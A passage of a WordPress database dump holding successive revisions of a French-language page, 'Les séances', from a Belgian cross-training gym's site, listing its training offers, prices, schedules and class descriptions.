(106, 1, '2013-06-16 14:01:57', '2013-06-16 14:01:57', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:01:57', '2013-06-16 14:01:57', '', 11, 'http://www.crosstrainingcenter.be/?p=106', 0, 'revision', '', 0),
(107, 1, '2013-06-16 14:14:58', '2013-06-16 14:14:58', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:14:58', '2013-06-16 14:14:58', '', 11, 'http://www.crosstrainingcenter.be/?p=107', 0, 'revision', '', 0),
(108, 1, '2013-06-16 14:16:00', '2013-06-16 14:16:00', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:00', '2013-06-16 14:16:00', '', 11, 'http://www.crosstrainingcenter.be/?p=108', 0, 'revision', '', 0),
(109, 1, '2013-06-16 14:16:31', '2013-06-16 14:16:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:31', '2013-06-16 14:16:31', '', 11, 'http://www.crosstrainingcenter.be/?p=109', 0, 'revision', '', 0),
(111, 1, '2013-06-16 14:17:45', '2013-06-16 14:17:45', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:45', '2013-06-16 14:17:45', '', 11, 'http://www.crosstrainingcenter.be/?p=111', 0, 'revision', '', 0),
(110, 1, '2013-06-16 14:17:07', '2013-06-16 14:17:07', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:07', '2013-06-16 14:17:07', '', 11, 'http://www.crosstrainingcenter.be/?p=110', 0, 'revision', '', 0),
(112, 1, '2013-06-16 14:18:18', '2013-06-16 14:18:18', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:18', '2013-06-16 14:18:18', '', 11, 'http://www.crosstrainingcenter.be/?p=112', 0, 'revision', '', 0),
(113, 1, '2013-06-16 14:18:50', '2013-06-16 14:18:50', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:50', '2013-06-16 14:18:50', '', 11, 'http://www.crosstrainingcenter.be/?p=113', 0, 'revision', '', 0),
(114, 1, '2013-06-16 14:20:17', '2013-06-16 14:20:17', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color:#999999;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:20:17', '2013-06-16 14:20:17', '', 11, 'http://www.crosstrainingcenter.be/?p=114', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
